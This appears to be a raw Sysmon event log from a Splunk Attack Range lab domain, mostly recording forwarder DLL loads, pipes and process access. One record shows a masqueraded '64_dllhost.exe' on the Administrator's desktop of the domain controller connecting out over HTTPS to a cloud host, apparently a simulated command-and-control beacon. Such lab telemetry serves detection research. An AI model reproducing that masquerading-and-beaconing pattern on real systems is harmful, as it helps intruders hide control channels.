Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001606516Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606515Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001606514Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606513Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606512Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606511Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606510Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606509Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606508Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606507Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606506Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606505Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606504Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606503Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606502Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606501Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001606500Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606499Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606498Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606497Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606496Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x80000000000000001606495Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606494Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606493Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.636{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606492Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606491Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606490Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606489Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606488Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606487Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 534500x80000000000000001606486Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.081{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 10341000x80000000000000001606485Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.081{21761711-7A88-6080-C760-00000000BB01}5668400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606484Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.081{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606483Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.081{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x80000000000000001095251Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:33.513{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095250Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:33.513{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606552Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:34.805{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606551Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:34.805{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=715A81FD95A6494DB51716707323D4FA,SHA256=B1E377EC3846F24E37E5A389BCE788116A8EEF936F16D99BCB67F4F9DA530F2Afalsefalse - insufficient disk space 354300x80000000000000001095257Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:30.159{761B69BB-65B6-6080-265D-00000000BA01}2304C:\Users\Administrator\Desktop\64_dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1158-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x80000000000000001095256Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:34.622{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C815CBB38D403004193D1AA3735F75FA,SHA256=954D04799F0F856B1A1E9800E6796CA4820B408338A40056BF72271520566FAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095255Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:34.606{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C939C2D3B4EF7E0FF490DBE7275C55CC,SHA256=F3E0C23A79E45850F8AD844D15F80DD2734961AA0D543390C910868E917ABC9B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001606550Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:18:34.067{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d736e3-0x1f42fe40) 10341000x80000000000000001095254Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:34.514{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095253Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:34.514{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606554Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:35.872{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606553Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:35.872{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=770F6D57539AA56C3435F129D5BAD087,SHA256=E2AB47A476E3E42BD43CCDB8C53AF06A73DBE8C427AA5A5AC3A354DA8D32F6A5falsefalse - insufficient disk space 23542300x80000000000000001095260Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:35.621{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21FEFAD7919871700D9A06471C569FC7,SHA256=7D29E711F4E580DFD2A20D0639D94FE05E8D8D7F0852384E86585FE7C4F759C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095259Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:35.515{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095258Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:35.515{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606556Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:36.928{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606555Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:36.928{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89A93237340857B05F1B99E6662E99EB,SHA256=F016A5815ECA0C7BB6F592923C48A9DA3FD1A59F288CB7FC533AECE6C9D20893falsefalse - insufficient disk space 354300x80000000000000001095265Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.686{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 